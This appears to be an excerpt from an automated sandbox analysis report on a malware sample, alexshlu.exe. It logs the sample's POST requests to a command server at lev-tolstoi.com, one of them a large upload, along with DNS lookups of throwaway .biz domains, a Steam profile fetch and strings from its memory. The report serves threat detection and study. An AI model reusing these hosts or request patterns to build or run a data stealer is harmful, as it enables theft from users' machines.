                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XRK0RM6J3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1171Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2CZLVT98GDNSWIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 582063Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 85Host: lev-tolstoi.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: alexshlu.exe, 00000003.00000003.1754749506.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1774485750.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1775631412.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: BVsteamstatic.lev-tolstoi.comlev-tolstoi.comsets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized equals www.youtube.com (Youtube)
                Source: alexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized equals www.youtube.com (Youtube)
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=8a0582c0d1571303a7d0d81f; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveWed, 18 Dec 2024 11:08:05 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: alexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.comHI2 equals www.youtube.com (Youtube)
                Source: alexshlu.exe, 00000003.00000003.1754749506.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1774485750.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1775631412.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: sets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: drive-connect.cyou
                Source: global trafficDNS traffic detected: DNS query: se-blurry.biz
                Source: global trafficDNS traffic detected: DNS query: zinc-sneark.biz
                Source: global trafficDNS traffic detected: DNS query: dwell-exclaim.biz
                Source: global trafficDNS traffic detected: DNS query: formy-spill.biz
                Source: global trafficDNS traffic detected: DNS query: covery-mover.biz
                Source: global trafficDNS traffic detected: DNS query: dare-curbys.biz
                Source: global trafficDNS traffic detected: DNS query: print-vexer.biz
                Source: global trafficDNS traffic detected: DNS query: impend-differ.biz
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                Source: alexshlu.exe, 00000003.00000003.1608240091.0000000003501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: alexshlu.exe, 00000003.00000003.1608240091.0000000003501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: alexshlu.exe, 00000003.00000003.1608240091.0000000003501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: alexshlu.exe, 00000003.00000003.1608240091.0000000003501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: alexshlu.exe, 00000003.00000003.1608240091.0000000003501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: alexshlu.exe, 00000003.00000003.1608240091.0000000003501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: alexshlu.exe, 00000003.00000003.1608240091.0000000003501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: alexshlu.exe, 00000003.00000003.1608240091.0000000003501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: alexshlu.exe, 00000003.00000003.1608240091.0000000003501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1528531670.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1528531670.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1528531670.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: alexshlu.exe, 00000003.00000003.1608240091.0000000003501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: alexshlu.exe, 00000003.00000003.1608240091.0000000003501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: alexshlu.exe, 00000003.00000003.1529377207.0000000003528000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529199963.000000000352B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529270353.0000000003528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                Source: alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                Source: alexshlu.exe, 00000003.00000003.1529377207.0000000003528000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529199963.000000000352B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529270353.0000000003528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                Source: alexshlu.exe, 00000003.00000003.1529377207.0000000003528000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529199963.000000000352B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529270353.0000000003528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: alexshlu.exe, 00000003.00000003.1529377207.0000000003528000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529199963.000000000352B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529270353.0000000003528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                Source: alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1528531670.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=THDq-gsQ
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=0Xxx
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=kOc26QwM0vlX&l=e
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
